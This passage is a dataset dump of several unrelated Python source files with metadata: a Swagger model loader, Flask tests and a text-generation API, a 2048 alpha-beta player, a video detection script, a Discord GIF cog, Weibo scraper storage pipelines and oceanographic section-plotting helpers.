urlparse.urljoin(base_url + '/', path.strip('/'))\n api_dict['api_declaration'] = json_load_url(\n self.session, api_dict['url'])\n\n def process_resource_listing(self, resources):\n jsonified = jsonify(resources)\n for processor in self.processors:\n processor.apply(jsonified)\n return jsonified\n\n\ndef validate_required_fields(json, required_fields, context):\n \"\"\"Checks a JSON object for a set of required fields.\n\n If any required field is missing, a SwaggerError is raised.\n\n :type json: Jsonified\n :param json: JSON object to check.\n :param required_fields: List of required fields.\n :param context: Current context in the API.\n \"\"\"\n missing_fields = [f for f in required_fields\n if not f in json.get_field_names()]\n\n if missing_fields:\n raise SwaggerError(\n \"Missing fields: %s\" % ', '.join(missing_fields), context)\n\n\ndef load_file(resource_listing_file, session=None, processors=None):\n \"\"\"Loads a resource listing file, applying the given processors.\n\n :param resource_listing_file: File name for a resource listing.\n :param processors: List of SwaggerProcessors to apply to the resulting\n resource.\n :return: Processed object model from\n :raise: IOError: On error reading api-docs.\n \"\"\"\n file_path = os.path.abspath(resource_listing_file)\n url = urlparse.urljoin('file:', urllib.pathname2url(file_path))\n # When loading from files, everything is relative to the resource listing\n dir_path = os.path.dirname(file_path)\n base_url = urlparse.urljoin('file:', urllib.pathname2url(dir_path))\n return load_url(url, session=session, processors=processors,\n base_url=base_url)\n\n\ndef load_url(resource_listing_url, session=None, processors=None,\n base_url=None):\n \"\"\"Loads a resource listing, applying the given processors.\n\n :param resource_listing_url: URL for a resource listing.\n :param processors: List of SwaggerProcessors to apply to the resulting\n resource.\n :param base_url: Optional URL to be the base URL for finding 
API\n declarations. If not specified, 'basePath' from the\n resource listing is used.\n :return: Processed object model from\n :raise: IOError, URLError: On error reading api-docs.\n \"\"\"\n if session is None:\n session = requests.Session()\n\n loader = Loader(session=session, processors=processors)\n return loader.load_resource_listing(\n resource_listing_url, base_url=base_url)\n\n\ndef load_json(resource_listing, session=None, processors=None):\n if session is None:\n session = requests.Session()\n\n loader = Loader(session=session, processors=processors)\n return loader.process_resource_listing(resource_listing)\n", "sub_path": "swaggerpy/swagger_model.py", "file_name": "swagger_model.py", "file_ext": "py", "file_size_in_byte": 9150, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "swaggerpy.processors.SwaggerProcessor", "line_number": 54, "usage_type": "name"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 62, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 70, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 81, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 104, "usage_type": "call"}, {"api_name": "urlparse.urlparse", "line_number": 132, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 135, "usage_type": "call"}, {"api_name": "json.load", "line_number": 137, "usage_type": "call"}, {"api_name": "urlparse.urljoin", "line_number": 184, "usage_type": "call"}, {"api_name": "swaggerpy.jsonify.jsonify", "line_number": 189, "usage_type": "call"}, {"api_name": "json.get_field_names", "line_number": 206, "usage_type": "call"}, {"api_name": "swaggerpy.processors.SwaggerError", "line_number": 209, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 222, "usage_type": "call"}, {"api_name": "os.path", "line_number": 222, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 223, "usage_type": "call"}, {"api_name": "urllib.pathname2url", "line_number": 223, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "urlparse.urljoin", "line_number": 226, "usage_type": "call"}, {"api_name": "urllib.pathname2url", "line_number": 226, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 245, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 254, "usage_type": "call"}]} +{"seq_id": "127810493", "text": "import unittest\nfrom flask import Flask, jsonify\nimport flask\nfrom flask_errors import init_app, HTTPError\n\n\nclass HTTPErrorTestCase(unittest.TestCase):\n def setUp(self):\n self.app = Flask(__name__)\n\n def test_get_message(self):\n message = 'foo bar'\n identifier = ''\n status_code = 400\n\n @self.app.route('/')\n def index():\n raise HTTPError(message, identifier, status_code)\n\n init_app(self.app)\n\n tc = self.app.test_client()\n\n r = tc.get('/')\n err = flask.json.loads(r.get_data())\n print(err)\n", "sub_path": "tests/test_core.py", "file_name": "test_core.py", "file_ext": "py", "file_size_in_byte": 591, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "unittest.TestCase", "line_number": 7, "usage_type": "attribute"}, {"api_name": "flask.Flask", "line_number": 9, "usage_type": 
"call"}, {"api_name": "flask_errors.HTTPError", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_errors.init_app", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.json", "line_number": 25, "usage_type": "attribute"}]} +{"seq_id": "553484677", "text": "# -*- encoding: utf-8 -*-\nfrom flask import Flask, request, Response\nimport json\nimport numpy as np\nimport gpt_gen\nimport sys\nfrom datetime import datetime\nimport logging\napp = Flask(__name__)\napp.logger.setLevel(logging.INFO)\nport = 5000\nstyle = 0#0大白狗, 1散文\nif len(sys.argv)>1:\n port = int(sys.argv[1])\nmaxNext = 5\npath_next = 'model/nnlm/D_next.json'\npath_simi = 'model/nnlm/D_simi.json'\nD_simi = json.load(open(path_simi,'r',encoding='utf-8'))\nD_next = json.load(open(path_next,'r',encoding='utf-8'))\nD_simi = {k:json.loads(D_simi[k]) for k in D_simi}\nD_next = {k:json.loads(D_next[k]) for k in D_next}\n@app.route('/api/gen', methods=['POST'])\ndef test2():\n r = request.json\n data = r[\"input\"]\n if \"num\" in r:\n num = r[\"num\"]\n else:\n num = 5\n quick = False\n if \"quick\" in r:\n print(\"quick pattern\")\n if r[\"quick\"]==\"True\":\n quick = True\n app.logger.info(data)\n try:\n now = datetime.now()\n app.logger.info('time: {}'.format(now))\n result = gpt_gen.nnlm_modelpredict(D_simi,D_next,inputStr=[data],maxNext=maxNext,maxChoice=10,num=num)\n then = datetime.now()\n app.logger.info('time: {}'.format(then))\n #app.logger.info('time for : {}'.format(then - now))\n app.logger.info(\"input:{}\".format(data))\n app.logger.info(\"output:\\n{}\".format('\\n'.join(result)))\n response = {'message':'success','input':data,'result': result}\n except Exception as e:\n app.logger.error(\"error:\",e)\n response = {'message': 'error', 'input': data, 'result': None}\n response_pickled = json.dumps(response)\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n# start flask app\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=port)\n", "sub_path": "web/app_nnlm.py", "file_name": "app_nnlm.py", "file_ext": "py", "file_size_in_byte": 1809, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "flask.Flask", "line_number": 9, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 14, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 18, "usage_type": "call"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 20, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.json", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "gpt_gen.nnlm_modelpredict", "line_number": 39, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 49, "usage_type": "call"}, {"api_name": "flask.Response", "line_number": 50, "usage_type": "call"}]} 
+{"seq_id": "206398907", "text": "from BaseAI_3 import BaseAI\nfrom Grid_3 import Grid\nimport numpy as np\nimport time\nimport helper as helper\n\ndef maximize(grid, depth, start, first_move, alpha, beta):\n if grid.canMove() == False or time.clock() - start > 0.2 or depth == 0:\n return (grid , helper.score(grid), first_move)\n\n best_max = (None, -np.inf)\n moves = grid.getAvailableMoves()\n for move in moves:\n if depth == 4:\n first_move = move\n child = helper.get_max_child(move, grid)\n max_tuple = minimize(child, depth - 1, start, first_move, alpha, beta)\n if max_tuple[1] > best_max[1]:\n best_max = max_tuple\n if max_tuple[1] >= beta:\n break\n if max_tuple[1] > alpha:\n alpha = max_tuple[1]\n return best_max\n\ndef minimize(grid, depth, start, first_move, alpha, beta):\n if grid.canMove() == False or time.clock() - start > 0.2 or depth == 0:\n return (grid ,helper.score(grid), first_move)\n\n best_min = (None, np.inf)\n free_cells = grid.getAvailableCells()\n for value in [2,4]:\n for pos in free_cells:\n child = helper.get_min_child(pos, value, grid)\n min_tuple = maximize(child, depth - 1, start, first_move, alpha, beta)\n if min_tuple[1] < best_min[1]:\n best_min = min_tuple\n if min_tuple[1] < beta:\n beta = min_tuple[1]\n if min_tuple[1] <= alpha:\n break\n return best_min", "sub_path": "P2/alphabeta.py", "file_name": "alphabeta.py", "file_ext": "py", "file_size_in_byte": 1471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.clock", "line_number": 8, "usage_type": "call"}, {"api_name": "helper.score", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 11, "usage_type": "attribute"}, {"api_name": "helper.get_max_child", "line_number": 16, "usage_type": "call"}, {"api_name": "time.clock", "line_number": 27, "usage_type": "call"}, {"api_name": "helper.score", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 30, "usage_type": "attribute"}, {"api_name": "helper.get_min_child", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "632446269", "text": "#### My import\n\nimport argparse\nimport Utils_Image\nimport Utils_Video\nimport Utils_Tensorbox\nimport Classes\nimport progressbar\nimport time\nimport os\n\n######### MAIN ###############\n\ndef main():\n '''\n Parse command line arguments and execute the code \n\n '''\n\n ######### TENSORBOX PARAMETERS\n\n\n start = time.time()\n\n parser = argparse.ArgumentParser()\n # parser.add_argument('--result_folder', default='summary_result/', type=str)\n # parser.add_argument('--summary_file', default='results.txt', type=str)\n parser.add_argument('--output_name', default='output.mp4', type=str)\n parser.add_argument('--hypes', default='./TENSORBOX/hypes/overfeat_rezoom.json', type=str)\n parser.add_argument('--weights', default='./TENSORBOX/data/save.ckpt-1250000', type=str)\n parser.add_argument('--perc', default=5, type=int)\n parser.add_argument('--path_video', default='ILSVRC2015_val_00013002.mp4', type=str)# required=True, type=str)\n\n args = parser.parse_args()\n\n # hypes_file = './hypes/overfeat_rezoom.json'\n # weights_file= './output/save.ckpt-1090000'\n\n path_video_folder = os.path.splitext(os.path.basename(args.path_video))[0]\n pred_idl = './%s/%s_val.idl' % (path_video_folder, path_video_folder)\n idl_filename=path_video_folder+'/'+path_video_folder+'.idl'\n frame_list=[]\n frame_list = Utils_Video.extract_idl_from_frames(args.path_video, args.perc, path_video_folder, 
'frames/', idl_filename )\n\n    progress = progressbar.ProgressBar(widgets=[progressbar.Bar('=', '[', ']'), ' ',progressbar.Percentage(), ' ',progressbar.ETA()])\n\n    for image_path in progress(frame_list):\n        Utils_Image.resizeImage(image_path)\n    Utils_Image.resizeImage(-1)\n\n    det_frame_list=Utils_Tensorbox.still_image_TENSORBOX_multiclass( frame_list, path_video_folder, args.hypes, args.weights, pred_idl)\n    Utils_Video.make_video_from_list(args.output_name, det_frame_list)\n    end = time.time()\n\n    print(\"Elapsed Time:%d Seconds\"%(end-start))\n    print(\"Running Completed with Success!!!\")\n\nif __name__ == '__main__':\n    main()\n\n\n\n\n", "sub_path": "VID_tensorbox_multi_class.py", "file_name": "VID_tensorbox_multi_class.py", "file_ext": "py", "file_size_in_byte": 2078, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "time.time", "line_number": 23, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.splitext", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 39, "usage_type": "call"}, {"api_name": "Utils_Video.extract_idl_from_frames", "line_number": 43, "usage_type": "call"}, {"api_name": "progressbar.ProgressBar", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.Bar", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.Percentage", "line_number": 45, "usage_type": "call"}, {"api_name": "progressbar.ETA", "line_number": 45, "usage_type": "call"}, {"api_name": "Utils_Image.resizeImage", "line_number": 48, "usage_type": "call"}, {"api_name": "Utils_Image.resizeImage", "line_number": 49, "usage_type": "call"}, {"api_name": "Utils_Tensorbox.still_image_TENSORBOX_multiclass", "line_number": 51, "usage_type": "call"}, {"api_name": "Utils_Video.make_video_from_list", "line_number": 52, "usage_type": "call"}, {"api_name": "time.time", "line_number": 53, "usage_type": "call"}]}
+{"seq_id": "79102859", "text": "import json\nimport random\nimport time\n\nimport discord\nimport requests\nfrom discord.ext import commands\n\nimport utilities.kat_logger as logger\nimport utilities.kat_utilities as utilities\n\n\nclass Fun(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        self.log = logger.get_logger(self.qualified_name)\n        self.log.info(f\"Loaded {self.qualified_name}\")\n\n\n        self.megu_cache_time = 99999999999\n        r = requests.get(\n            \"https://api.tenor.com/v1/search?q=megumin&key=4KDPUPUVOVRW&limit=8&anon_id=312ced313baf42079d1588df7e032c69\")\n        if r.status_code == 200:\n            # load the GIFs using the urls for the smaller GIF sizes\n            self.megumin_gif_cache = json.loads(r.content)\n        else:\n            self.megumin_gif_cache = []\n\n    #### Hit or miss\n    @commands.command(aliases=['huh'])\n    async def hitormiss(self, ctx):\n        await ctx.send(\n            \"**I guess they never miss, huh?**\\nhttps://cdn.discordapp.com/attachments/569186352583933953/570671772320661544/nico1.mp4\")\n\n    @commands.command()\n    async def megumin(self, ctx):\n\n        if len(self.megumin_gif_cache) == 0 or time.time() - self.megu_cache_time > 10000:\n            self.megu_cache_time = time.time()\n            r = requests.get(\n                \"https://api.tenor.com/v1/search?q=megumin&key=4KDPUPUVOVRW&limit=8&anon_id=312ced313baf42079d1588df7e032c69\")\n\n            if r.status_code == 200:\n                # load the GIFs using the urls for the smaller GIF sizes\n                self.log.info(\"Downloaded megumin gifs to cache\")\n                
self.megumin_gif_cache = json.loads(r.content)\n\n gif = \\\n self.megumin_gif_cache['results'][random.randrange(0, len(self.megumin_gif_cache['results']))]['media'][0][\n 'gif']['url']\n\n embed = discord.Embed(title=(utilities.get_response('command_fun_megumin_embed_title')))\n embed.set_image(url=gif)\n embed.colour = discord.Color.red()\n await ctx.send(embed=embed)\n\n\n\n\n\n # cog framework\n def cog_unload(self):\n self.log.info(f\"Unloading {self.qualified_name}\")\n self.log.destroy()\n\n async def cog_command_error(self, ctx, error):\n self.log.warn(f\"{ctx.command} encountered an error: {error}\")\n\n async def cog_before_invoke(self, ctx):\n self.log.info(f\"{ctx.author.name} | {ctx.author.id} Performed {ctx.command}\")\n\ndef setup(bot):\n bot.add_cog(Fun(bot))", "sub_path": "cogs/fun.py", "file_name": "fun.py", "file_ext": "py", "file_size_in_byte": 2440, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 13, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "utilities.kat_logger.get_logger", "line_number": 16, "usage_type": "call"}, {"api_name": "utilities.kat_logger", "line_number": 16, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 21, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 30, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 30, "usage_type": "name"}, {"api_name": "time.time", "line_number": 38, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 40, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 46, "usage_type": "call"}, {"api_name": "random.randrange", "line_number": 49, "usage_type": "call"}, {"api_name": "discord.Embed", "line_number": 52, "usage_type": "call"}, {"api_name": "utilities.kat_utilities.get_response", "line_number": 52, "usage_type": "call"}, {"api_name": "utilities.kat_utilities", "line_number": 52, "usage_type": "name"}, {"api_name": "discord.Color.red", "line_number": 54, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 54, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.command", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 35, "usage_type": "name"}]} +{"seq_id": "396918424", "text": "from weibospider.items import TweetsItem,BaseInfoItem\nimport logging\n\nimport MySQLdb\nfrom twisted.enterprise import adbapi\nimport MySQLdb.cursors\n\nimport pymongo\n\n\nclass MongoPipeline(object):\n userinfo = 'users'\n Tweets = 'tweets'\n\n def __init__(self, mongo_uri, mongo_db):\n self.mongo_uri = mongo_uri\n self.mongo_db = mongo_db\n\n @classmethod\n def from_crawler(cls, crawler):\n return cls(\n mongo_uri=crawler.settings.get('MONGO_URI'),\n mongo_db=crawler.settings.get('MONGO_DATABASE')\n )\n\n def open_spider(self, spider):\n self.client = pymongo.MongoClient(self.mongo_uri)\n self.db = self.client[self.mongo_db]\n\n def close_spider(self, spider):\n self.client.close()\n\n def process_item(self, item, spider):\n if isinstance(item, BaseInfoItem):\n self.db[self.userinfo].insert(dict(item))\n if isinstance(item, TweetsItem):\n self.db[self.Tweets].insert(dict(item))\n\n\n\nclass MysqlPipeline(object):\n def __init__(self,settings):\n 
self.conn = MySQLdb.connect(settings.get('MYSQL_HOST'), settings.get('MYSQL_USER'), settings.get('MYSQL_PASSWORD'),\n                                    settings.get('MYSQL_DBNAME'), charset=\"utf8mb4\", use_unicode=True)\n        self.cursor = self.conn.cursor()\n\n    @classmethod\n    def from_settings(cls, settings):\n        return cls(settings)\n\n    def close_spider(self, spider):\n        self.cursor.close()\n        self.conn.close()\n\n    def process_item(self, item, spider):\n        sql = ''\n        if isinstance(item, BaseInfoItem):\n            for key in BaseInfoItem.fields:\n                if item.get(key)==None:\n                    item[key]=''\n            sql, params = self.insert_base_info(item)\n        elif isinstance(item, TweetsItem):\n            for key in TweetsItem.fields:\n                if item.get(key)==None:\n                    item[key]=''\n            if item['IsTransfer'] == 0 and item['ImageUrl']:\n                if len(item['ImageUrl']) > 0:\n                    if 'bmiddle' in item['ImageUrl']:\n                        sql, params = self.insert_tweets(item)\n        try:\n            if sql:\n                self.cursor.execute(sql, params)\n                self.conn.commit()\n        except Exception as e:\n            logging.info(e)\n            self.conn.rollback()\n\n\n    def insert_base_info(self,item):\n        insert_sql = '''\n            insert into weibo_userinfo(ID, NickName,Gender,Location,BriefIntroduction,Birthday,Tweets,Follows,Fans,Viplevel,Talente,Authentication,AuthenticationInfo,Url)\n            VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n        '''\n        params = (\n            item['Id'], item['NickName'], item['Gender'], item['Location'], item['BriefIntroduction'], item['Birthday'],\n            item['Tweets'], item['Follows'], item['Fans'], item['Viplevel'], item['Talente'], item['Authentication'],\n            item['AuthenticationInfo'], item['Url'])\n        return insert_sql,params\n\n\n\n    def insert_tweets(self, item):\n        insert_sql = '''\n            insert into weibo_tweets(wbid,ID, IsTransfer, Content, Likes,Transfer,Comment,PubTime,Tools,Co_oridinates, ImageUrl)\n            VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\n        '''\n        params=(item['id'],item['Id'],item['IsTransfer'],item['Content'],item['Like'],item['Transfer'],item['Comment'],item['PubTime'],item['Tools'],item['Co_oridinates'],item['ImageUrl'])\n        return insert_sql, params\n\n\n\n\n\n\nclass MysqlTwistedPipline(object):\n    def __init__(self, dbpool):\n        self.dbpool = dbpool\n\n    @classmethod\n    def from_settings(cls, settings):\n        dbparms = dict(\n            host = settings[\"MYSQL_HOST\"],\n            db = settings[\"MYSQL_DBNAME\"],\n            user = settings[\"MYSQL_USER\"],\n            passwd = settings[\"MYSQL_PASSWORD\"],\n            charset='utf8mb4',\n            cursorclass=MySQLdb.cursors.DictCursor,\n            use_unicode=True,\n        )\n        dbpool = adbapi.ConnectionPool(\"MySQLdb\", **dbparms)\n        return cls(dbpool)\n\n    def close_spider(self, spider):\n        self.dbpool.close()\n\n    def process_item(self, item, spider):\n        # use twisted to run the MySQL insert asynchronously\n        if isinstance(item, BaseInfoItem):\n            for key in BaseInfoItem.fields:\n                if item.get(key)==None:\n                    item[key]=''\n            query = self.dbpool.runInteraction(self.insert_base_info, item)\n            query.addErrback(self.handle_error, item)\n        elif isinstance(item, TweetsItem):\n            for key in TweetsItem.fields:\n                if item.get(key)==None:\n                    item[key]=''\n            query = self.dbpool.runInteraction(self.insert_tweets, item)\n            query.addErrback(self.handle_error, item)\n        # elif isinstance(item, TweetsInfoItem):\n        #     query = self.dbpool.runInteraction(self.update_tweets_info, item)\n        #     query.addErrback(self.handle_error, item)  # handle exceptions\n\n    def handle_error(self, failure, item):\n        # handle exceptions raised by the asynchronous insert\n        logging.debug(failure)\n\n\n    def insert_base_info(self, cursor, item):\n        insert_sql='''\n            insert into userinfo(ID, 昵称,性别,地区,简介,生日,微博数,关注数,粉丝数,会员等级,达人,认证,认证信息,Url)\n            VALUES (%s, %s, %s, %s, %s, %s, %s,%s, %s, %s, %s, %s, %s, %s)\n        '''\n        params = 
(item['Id'], item['NickName'], item['Gender'], item['Location'], item['BriefIntroduction'], item['Birthday'],\n item['Tweets'],item['Follows'],item['Fans'],item['Viplevel'], item['Talente'], item['Authentication'],\n item['AuthenticationInfo'], item['Url'])\n cursor.execute(insert_sql, params)\n\n\n def insert_tweets(self, cursor, item):\n insert_sql = '''\n insert into tweets(wbid,ID, IsTransfer, Content, Likes,Transfer,Comment,PubTime,Tools,Co_oridinates )\n VALUES (%s,%s, %s, %s, %s, %s, %s, %s, %s, %s)\n '''\n params=(item['id'],item['Id'],item['IsTransfer'],item['Content'],item['Like'],item['Transfer'],item['Comment'],item['PubTime'],item['Tools'],item['Co_oridinates'])\n cursor.execute(insert_sql, params)\n\n", "sub_path": "weibospider/weibospider/pipelines.py", "file_name": "pipelines.py", "file_ext": "py", "file_size_in_byte": 6307, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pymongo.MongoClient", "line_number": 27, "usage_type": "call"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 34, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 36, "usage_type": "argument"}, {"api_name": "MySQLdb.connect", "line_number": 43, "usage_type": "call"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 57, "usage_type": "argument"}, {"api_name": "weibospider.items.BaseInfoItem.fields", "line_number": 58, "usage_type": "attribute"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 58, "usage_type": "name"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 62, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem.fields", "line_number": 63, "usage_type": "attribute"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 63, "usage_type": "name"}, {"api_name": "logging.info", "line_number": 75, "usage_type": "call"}, {"api_name": "MySQLdb.cursors", "line_number": 117, "usage_type": "attribute"}, {"api_name": "twisted.enterprise.adbapi.ConnectionPool", "line_number": 120, "usage_type": "call"}, {"api_name": "twisted.enterprise.adbapi", "line_number": 120, "usage_type": "name"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 128, "usage_type": "argument"}, {"api_name": "weibospider.items.BaseInfoItem.fields", "line_number": 129, "usage_type": "attribute"}, {"api_name": "weibospider.items.BaseInfoItem", "line_number": 129, "usage_type": "name"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 134, "usage_type": "argument"}, {"api_name": "weibospider.items.TweetsItem.fields", "line_number": 135, "usage_type": "attribute"}, {"api_name": "weibospider.items.TweetsItem", "line_number": 135, "usage_type": "name"}, {"api_name": "logging.debug", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "533554397", "text": "from __future__ import print_function\n\n\ndef _process_2D_plot_args(args, gridding_dz=1):\n\n from numpy import array, ma, nan, ndarray, nanmax, arange\n from pandas import DataFrame, Series\n from xarray import DataArray\n from . 
import tools\n\n if len(args) == 3:\n x = array(args[0])\n y = array(args[1]).astype(float)\n z = args[2]\n if isinstance(z, ma.MaskedArray):\n z[z.mask] = nan\n else:\n z = ma.masked_invalid(array(z)).astype(float)\n\n if (x.size == y.size) & (len(z.shape) == 1):\n bins = arange(0, nanmax(y), gridding_dz)\n df = tools.bin_depths(z, x, y, bins=bins)\n x = df.columns\n y = df.index\n z = ma.masked_invalid(df.values)\n return x, y, z\n\n elif len(args) == 1:\n z = args[0]\n if isinstance(z, DataArray):\n z = z.to_series().unstack()\n elif isinstance(z, (ndarray, Series)):\n if z.ndim == 2:\n z = DataFrame(z)\n else:\n raise IndexError('The input must be a 2D DataFrame or ndarray')\n\n x = z.columns.values\n y = z.index.values\n z = ma.masked_invalid(z.values).astype(float)\n\n return x, y, z\n\n\ndef save_figures_to_pdf(fig_list, pdf_name, **savefig_kwargs):\n import matplotlib.backends.backend_pdf\n from matplotlib import pyplot as plt\n\n pdf = matplotlib.backends.backend_pdf.PdfPages(pdf_name)\n for fig in fig_list: # will open an empty extra figure :(\n pdf.savefig(fig.number, dpi=120)\n pdf.close()\n plt.close('all')\n\n\nclass plot_functions(object):\n @staticmethod\n def __new__(*args, **kwargs):\n\n if len(args) > 1:\n args = args[1:]\n return plot_functions.pcolormesh(*args, **kwargs)\n\n @staticmethod\n def pcolormesh(*args, **kwargs):\n \"\"\"\n Plot a section plot of the dives with x-time and y-depth and\n z-variable. The data can be linearly interpolated to fill missing\n depth values. The number of points to interpolate can be set with\n interpolate_dist.\n\n *args can be:\n - same length x, y, z. Will be gridded with depth of 1 meter.\n - x(m), y(n), z(n, m) arrays\n - z DataFrame where indicies are depth and columns are dives\n - z DataArray where dim0 is dives and dim1 is depth\n **kwargs can be:\n - ax - give an axes to the plotting function\n - robust - use the 0.5 and 99.5 percentile to set color limits\n - gridding_dz - gridding depth [default 1]\n\n The **kwargs can be anything that gets passed to plt.pcolormesh.\n Note that the colour is scaled to 1 and 99% of z.\n \"\"\"\n from matplotlib.pyplot import colorbar, subplots\n from numpy import datetime64, nanpercentile\n from datetime import datetime\n\n ax = kwargs.pop('ax', None)\n robust = kwargs.pop('robust', False)\n gridding_dz = kwargs.pop('gridding_dz', 1)\n\n x, y, z = _process_2D_plot_args(args, gridding_dz=gridding_dz)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust & (('vmin' not in kwargs) | ('vmax' not in kwargs)):\n kwargs['vmin'] = nanpercentile(z.data, 0.5)\n kwargs['vmax'] = nanpercentile(z.data, 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n\n im = ax.pcolormesh(x, y, z, rasterized=True, **kwargs)\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.max(), y.min())\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def contourf(*args, **kwargs):\n \"\"\"\n Plot a section plot of the dives with x-time and y-depth and\n z-variable. The data can be linearly interpolated to fill missing\n depth values. The number of points to interpolate can be set with\n interpolate_dist.\n\n *args can be:\n - same length x, y, z. 
Will be gridded with depth of 1 meter.\n - x(m), y(n), z(n, m) arrays\n - z DataFrame where indicies are depth and columns are dives\n - z DataArray where dim0 is dives and dim1 is depth\n **kwargs can be:\n - ax - give an axes to the plotting function\n - robust - use the 0.5 and 99.5 percentile to set color limits\n - gridding_dz - gridding depth [default 1]\n\n The **kwargs can be anything that gets passed to plt.pcolormesh.\n Note that the colour is scaled to 1 and 99% of z.\n \"\"\"\n\n from matplotlib.pyplot import colorbar, subplots\n from numpy import percentile, datetime64\n from datetime import datetime\n\n ax = kwargs.pop('ax', None)\n robust = kwargs.pop('robust', False)\n gridding_dz = kwargs.pop('gridding_dz', 1)\n\n x, y, z = _process_2D_plot_args(args, gridding_dz=gridding_dz)\n\n x_time = isinstance(x[0], (datetime, datetime64))\n\n if robust & (('vmin' not in kwargs) | ('vmax' not in kwargs)):\n kwargs['vmin'] = percentile(z[~z.mask], 0.5)\n kwargs['vmax'] = percentile(z[~z.mask], 99.5)\n\n if ax is None:\n fig, ax = subplots(1, 1, figsize=[11, 4])\n else:\n fig = ax.get_figure()\n\n im = ax.contourf(x, y, z, **kwargs)\n ax.cb = colorbar(mappable=im, pad=0.02, ax=ax)\n ax.set_xlim(x.min(), x.max())\n ax.set_ylim(y.max(), y.min())\n ax.set_ylabel('Depth (m)')\n ax.set_xlabel('Date' if x_time else 'Dives')\n\n [tick.set_rotation(45) for tick in ax.get_xticklabels()]\n fig.tight_layout()\n\n return ax\n\n @staticmethod\n def scatter(x, y, z, ax=None, robust=False, **kwargs):\n from matplotlib.pyplot import colorbar, subplots\n from numpy import ma, nanpercentile, 